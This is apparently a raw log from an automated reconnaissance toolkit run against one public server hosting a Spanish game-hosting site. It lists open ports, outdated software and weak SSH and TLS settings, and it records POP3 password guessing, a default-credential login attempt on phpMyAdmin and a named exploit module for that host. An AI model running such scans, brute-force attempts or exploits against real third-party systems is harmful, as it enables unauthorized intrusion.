- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 2.1.0
- (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- # message authentication code algorithms
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-256-96 -- [fail] removed since OpenSSH 6.1, removed from specification
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512-96 -- [fail] removed since OpenSSH 6.1, removed from specification
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 5.9)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -arcfour -- enc algorithm to remove
- (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -arcfour256 -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -arcfour128 -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-sha2-256-96 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- (rec) -hmac-sha2-512-96 -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:32 EST
- Nmap scan report for 5.135.156.30
- Host is up (0.14s latency).
- PORT STATE SERVICE VERSION
- 22/tcp filtered ssh
- Too many fingerprints match this host to give specific OS details
- Network Distance: 7 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 129.84 ms 10.248.200.1
- 2 153.61 ms 185.94.189.129
- 3 ...
- 4 141.16 ms 94.23.122.146
- 5 ... 6
- 7 141.24 ms 5.135.156.30
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:33 EST
- Nmap scan report for 5.135.156.30
- Host is up (0.14s latency).
- PORT STATE SERVICE VERSION
- 67/udp open|filtered dhcps
- |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
- Too many fingerprints match this host to give specific OS details
- Network Distance: 7 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 134.74 ms 10.248.200.1
- 2 162.79 ms 185.94.189.129
- 3 ...
- 4 141.35 ms 94.23.122.146
- 5 ... 6
- 7 146.63 ms 5.135.156.30
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:35 EST
- Nmap scan report for 5.135.156.30
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 68/udp open|filtered dhcpc
- Too many fingerprints match this host to give specific OS details
- Network Distance: 7 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 123.56 ms 10.248.200.1
- 2 180.82 ms 185.94.189.129
- 3 ...
- 4 188.24 ms 94.23.122.146
- 5 ... 6
- 7 134.99 ms 5.135.156.30
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 139.43 seconds
- + -- --=[Port 69 opened... running tests...
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:37 EST
- Nmap scan report for 5.135.156.30
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 69/udp open|filtered tftp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 7 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 122.62 ms 10.248.200.1
- 2 122.66 ms 185.94.189.129
- 3 ...
- 4 134.93 ms 94.23.122.146
- 5 ... 6
- 7 134.20 ms 5.135.156.30
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://5.135.156.30
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- #######################################################################################################################################
- http://5.135.156.30 [200 OK] Country[FRANCE][FR], Email[info@GameHosting.es,info@gamehosting.es], Google-Analytics[Universal][UA-60228867-1], IP[5.135.156.30], JQuery, Script[text/javascript], Strict-Transport-Security[max-age=63072000; includeSubdomains; preload], Title[Game Hosting España], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN]
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://5.135.156.30...
- ___________________________________________ SITE INFO ___________________________________________
- IP Title
- 5.135.156.30 Game Hosting España
- ____________________________________________ VERSION ____________________________________________
- Name Versions Type
- Roundcube CMS
- phpMyAdmin CMS
- Apache 2.2.11 | 2.2.12 | 2.2.13 | 2.2.14 | 2.2.15 | 2.2.16 | 2.2.17 Platform
- 2.2.18 | 2.2.19 | 2.2.20 | 2.2.21 | 2.2.22 | 2.2.23 | 2.2.24
- 2.2.25 | 2.2.26 | 2.2.27 | 2.2.28 | 2.2.29 | 2.3.0 | 2.3.1
- 2.3.10 | 2.3.11 | 2.3.12 | 2.3.13 | 2.3.14 | 2.3.15 | 2.3.16
- 2.3.2 | 2.3.3 | 2.3.4 | 2.3.5 | 2.3.6 | 2.3.7 | 2.3.8
- 2.3.9 | 2.4.0 | 2.4.1 | 2.4.2 | 2.4.3
- PHP 5.3.10-1ubuntu3.21 Platform
- Ubuntu 12.04 OS
- _________________________________________________________________________________________________
- Time: 23.0 sec Urls: 398 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Sun, 11 Nov 2018 17:41:17 GMT
- Content-Type: text/html
- Content-Length: 19427
- Last-Modified: Sun, 22 Apr 2018 08:55:09 GMT
- ETag: "1841322-4be3-56a6c140d9540"
- Accept-Ranges: bytes
- Vary: Accept-Encoding
- Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
- X-Frame-Options: SAMEORIGIN
- X-Content-Type-Options: nosniff
- Connection: keep-alive
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:41 EST
- Nmap scan report for 5.135.156.30
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- | Statistics: Performed 31 guesses in 20 seconds, average tps: 1.6
- |_ ERROR: Failed to connect.
- |_pop3-capabilities: SASL(PLAIN LOGIN) USER TOP CAPA STLS UIDL RESP-CODES PIPELINING
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: OpenWrt Kamikaze 7.09 (Linux 2.6.22) (96%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (94%), OpenWrt White Russian 0.9 (Linux 2.4.30) (94%), Linux 2.4.18 (92%), OpenWrt (Linux 3.3) (91%), OpenWrt Attitude Adjustment 12.09 (Linux 3.3) (91%), Linux 3.0 (89%), Crestron XPanel control system (89%), OpenWrt (Linux 2.4.30 - 2.4.34) (88%), OpenWrt (Linux 2.4.32) (88%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- TRACEROUTE (using port 443/tcp)
- HOP RTT ADDRESS
- 1 126.02 ms 5.135.156.30
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:42 EST
- Nmap scan report for 5.135.156.30
- Host is up (0.14s latency).
- PORT STATE SERVICE VERSION
- 123/udp open|filtered ntp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 7 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 129.05 ms 10.248.200.1
- 2 129.08 ms 185.94.189.129
- 3 ...
- 4 141.47 ms 94.23.122.146
- 5 ... 6
- 7 141.12 ms 5.135.156.30
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:44 EST
- Nmap scan report for 5.135.156.30
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 161/tcp filtered snmp
- 161/udp open|filtered snmp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 7 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 123.09 ms 10.248.200.1
- 2 159.05 ms 185.94.189.129
- 3 ...
- 4 134.66 ms 94.23.122.146
- 5 ...
- 6 159.43 ms 178.33.100.206
- 7 133.88 ms 5.135.156.30
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://5.135.156.30
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- #######################################################################################################################################
- https://5.135.156.30 [200 OK] Country[FRANCE][FR], Email[info@GameHosting.es,info@gamehosting.es], Google-Analytics[Universal][UA-60228867-1], HTTPServer[nginx], IP[5.135.156.30], JQuery, Script[text/javascript], Strict-Transport-Security[max-age=63072000; includeSubdomains; preload], Title[Game Hosting España], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], nginx
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginCompression
- PluginCertInfo
- PluginSessionRenegotiation
- PluginHSTS
- PluginHeartbleed
- PluginSessionResumption
- PluginOpenSSLCipherSuites
- PluginChromeSha1Deprecation
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- 5.135.156.30:443 => 5.135.156.30:443
- SCAN RESULTS FOR 5.135.156.30:443 - 5.135.156.30:443
- ----------------------------------------------------
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Deflate Compression:
- OK - Compression disabled
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: NOT SUPPORTED - TLS ticket not assigned.
- * Certificate - Content:
- SHA1 Fingerprint: 9df97c5a6bf8f7af0cf7cb1bcc7f6f1dfa613208
- Common Name: gamehosting.es
- Issuer: Let's Encrypt Authority X3
- Serial Number: 04AD2A61B2ECD0E25C959242703E514E51E0
- Not Before: Aug 18 00:36:11 2018 GMT
- Not After: Nov 16 00:36:11 2018 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['gamehosting.es']}
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match 5.135.156.30
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Certificate Chain Received: ['gamehosting.es']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 3.14 S
- ------------------------
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 5.135.156.30
- Testing SSL server 5.135.156.30 on port 443 using SNI name 5.135.156.30
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-384 DHE 384
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-384 DHE 384
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 4096 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 4096 bits
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-384 DHE 384
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-384 DHE 384
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-384 DHE 384
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-384 DHE 384
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 4096 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 4096 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 4096 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 4096 bits
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-384 DHE 384
- Accepted TLSv1.2 112 bits EDH-RSA-DES-CBC3-SHA DHE 4096 bits
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 4096 bits
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 4096 bits
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-384 DHE 384
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-384 DHE 384
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 4096 bits
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 4096 bits
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-384 DHE 384
- Accepted TLSv1.1 112 bits EDH-RSA-DES-CBC3-SHA DHE 4096 bits
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 4096 bits
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 4096 bits
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-384 DHE 384
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-384 DHE 384
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 4096 bits
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 4096 bits
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-384 DHE 384
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: gamehosting.es
- Altnames: DNS:gamehosting.es
- Issuer: Let's Encrypt Authority X3
- Not valid before: Aug 18 00:36:11 2018 GMT
- Not valid after: Nov 16 00:36:11 2018 GMT
- #######################################################################################################################################
- I, [2018-11-11T12:50:04.928445 #8429] INFO -- : Initiating port scan
- I, [2018-11-11T12:50:44.042533 #8429] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-11_12-50-04.xml
- I, [2018-11-11T12:50:44.043501 #8429] INFO -- : Discovered open port: 5.135.156.30:80
- I, [2018-11-11T12:50:44.654355 #8429] INFO -- : Discovered open port: 5.135.156.30:443
- I, [2018-11-11T12:50:45.946143 #8429] INFO -- : Discovered open port: 5.135.156.30:8083
- I, [2018-11-11T12:50:47.186599 #8429] INFO -- : <<<Enumerating vulnerable applications>>>
- [+] Yasuo found phpMyAdmin at http://5.135.156.30:80/phpmyadmin/. May require form based auth
- I, [2018-11-11T12:52:28.428138 #8429] INFO -- : Double-checking if the application implements a login page and initiating login bruteforce, hold on tight...
- [+] Trying app-specific default creds first -> admin:admin
- Could not find default login credentials, sucks
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +------------+------------------------------------+--------------------------------------------------+-----------+-----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +------------+------------------------------------+--------------------------------------------------+-----------+-----------+
- | phpMyAdmin | http://5.135.156.30:80/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
- +------------+------------------------------------+--------------------------------------------------+-----------+-----------+
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:56 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 12:56
- Completed NSE at 12:56, 0.00s elapsed
- Initiating NSE at 12:56
- Completed NSE at 12:56, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 12:56
- Completed Parallel DNS resolution of 1 host. at 12:56, 16.50s elapsed
- Initiating SYN Stealth Scan at 12:56
- Scanning 5.135.156.30 [474 ports]
- Discovered open port 22/tcp on 5.135.156.30
- Discovered open port 21/tcp on 5.135.156.30
- Discovered open port 80/tcp on 5.135.156.30
- Discovered open port 3306/tcp on 5.135.156.30
- Discovered open port 443/tcp on 5.135.156.30
- Completed SYN Stealth Scan at 12:56, 15.86s elapsed (474 total ports)
- Initiating Service scan at 12:56
- Scanning 5 services on 5.135.156.30
- Completed Service scan at 12:56, 14.04s elapsed (5 services on 1 host)
- Initiating OS detection (try #1) against 5.135.156.30
- Retrying OS detection (try #2) against 5.135.156.30
- Initiating Traceroute at 12:56
- Completed Traceroute at 12:56, 0.14s elapsed
- Initiating Parallel DNS resolution of 2 hosts. at 12:56
- Completed Parallel DNS resolution of 2 hosts. at 12:57, 16.50s elapsed
- NSE: Script scanning 5.135.156.30.
- Initiating NSE at 12:57
- Completed NSE at 12:57, 11.61s elapsed
- Initiating NSE at 12:57
- Completed NSE at 12:57, 0.00s elapsed
- Nmap scan report for 5.135.156.30
- Host is up (0.13s latency).
- Not shown: 423 filtered ports, 46 closed ports
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD or KnFTPD
- 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- | 1024 1d:76:48:2e:45:64:f3:5f:69:3f:69:19:8b:ac:48:97 (DSA)
- |_ 2048 2b:5c:a8:b2:86:3b:96:e8:14:28:7a:e3:c9:31:e2:54 (RSA)
- 80/tcp open http nginx
- | http-methods:
- |_ Supported Methods: POST OPTIONS GET HEAD
- |_http-server-header: nginx
- |_http-title: Game Hosting España
- 443/tcp open ssl/http nginx
- | http-methods:
- |_ Supported Methods: POST OPTIONS GET HEAD
- |_http-server-header: nginx
- |_http-title: 400 The plain HTTP request was sent to HTTPS port
- | ssl-cert: Subject: commonName=gamehosting.es
- | Subject Alternative Name: DNS:gamehosting.es
- | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-08-18T00:36:11
- | Not valid after: 2018-11-16T00:36:11
- | MD5: 291c ffe9 f8a1 460b c851 d127 4b75 939b
- |_SHA-1: 9df9 7c5a 6bf8 f7af 0cf7 cb1b cc7f 6f1d fa61 3208
- |_ssl-date: 2018-11-11T17:57:14+00:00; +1s from scanner time.
- | tls-nextprotoneg:
- |_ http/1.1
- 3306/tcp open mysql MySQL (blocked - too many connection errors)
- Aggressive OS guesses: OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (96%), OpenWrt White Russian 0.9 (Linux 2.4.30) (96%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (96%), Linux 3.0 (93%), OpenWrt Attitude Adjustment 12.09 (Linux 3.3) (93%), Linux 2.4.18 (93%), Asus RT-AC66U router (Linux 2.6) (92%), Asus RT-N16 WAP (Linux 2.6) (92%), Asus RT-N66U WAP (Linux 2.6) (92%), Tomato 1.28 (Linux 2.6.22) (92%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 2 hops
- TCP Sequence Prediction: Difficulty=262 (Good luck!)
- IP ID Sequence Generation: All zeros
- Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
- TRACEROUTE (using port 445/tcp)
- HOP RTT ADDRESS
- 1 126.44 ms 10.248.200.1
- 2 126.43 ms 5.135.156.30
- NSE: Script Post-scanning.
- Initiating NSE at 12:57
- Completed NSE at 12:57, 0.00s elapsed
- Initiating NSE at 12:57
- Completed NSE at 12:57, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 80.43 seconds
- Raw packets sent: 1399 (65.946KB) | Rcvd: 3281 (652.639KB)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 12:57 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 12:57
- Completed NSE at 12:57, 0.00s elapsed
- Initiating NSE at 12:57
- Completed NSE at 12:57, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 12:57
- Completed Parallel DNS resolution of 1 host. at 12:57, 16.51s elapsed
- Initiating UDP Scan at 12:57
- Scanning 5.135.156.30 [14 ports]
- Discovered open port 53/udp on 5.135.156.30
- Completed UDP Scan at 12:57, 1.91s elapsed (14 total ports)
- Initiating Service scan at 12:57
- Scanning 11 services on 5.135.156.30
- Service scan Timing: About 18.18% done; ETC: 13:06 (0:07:17 remaining)
- Completed Service scan at 12:59, 102.57s elapsed (11 services on 1 host)
- Initiating OS detection (try #1) against 5.135.156.30
- Retrying OS detection (try #2) against 5.135.156.30
- Initiating Traceroute at 12:59
- Completed Traceroute at 12:59, 7.20s elapsed
- Initiating Parallel DNS resolution of 1 host. at 12:59
- Completed Parallel DNS resolution of 1 host. at 12:59, 16.50s elapsed
- NSE: Script scanning 5.135.156.30.
- Initiating NSE at 12:59
- Completed NSE at 13:00, 20.25s elapsed
- Initiating NSE at 13:00
- Completed NSE at 13:00, 1.02s elapsed
- Nmap scan report for 5.135.156.30
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 53/udp open domain ISC BIND 9.8.1-P1
- | dns-nsid:
- |_ bind.version: 9.8.1-P1
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp filtered netbios-ns
- 138/udp filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp closed nfs
- Too many fingerprints match this host to give specific OS details
- Network Distance: 7 hops
- TRACEROUTE (using port 138/udp)
- HOP RTT ADDRESS
- 1 123.43 ms 10.248.200.1
- 2 124.11 ms 10.248.200.1
- 3 124.11 ms 10.248.200.1
- 4 124.11 ms 10.248.200.1
- 5 124.10 ms 10.248.200.1
- 6 124.10 ms 10.248.200.1
- 7 124.12 ms 10.248.200.1
- 8 ... 9
- 10 127.35 ms 10.248.200.1
- 11 ... 18
- 19 123.87 ms 10.248.200.1
- 20 128.32 ms 10.248.200.1
- 21 ... 28
- 29 123.32 ms 10.248.200.1
- 30 124.89 ms 10.248.200.1
- NSE: Script Post-scanning.
- Initiating NSE at 13:00
- Completed NSE at 13:00, 0.00s elapsed
- Initiating NSE at 13:00
- Completed NSE at 13:00, 0.00s elapsed
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 169.61 seconds
- Raw packets sent: 127 (5.932KB) | Rcvd: 1393 (167.069KB)
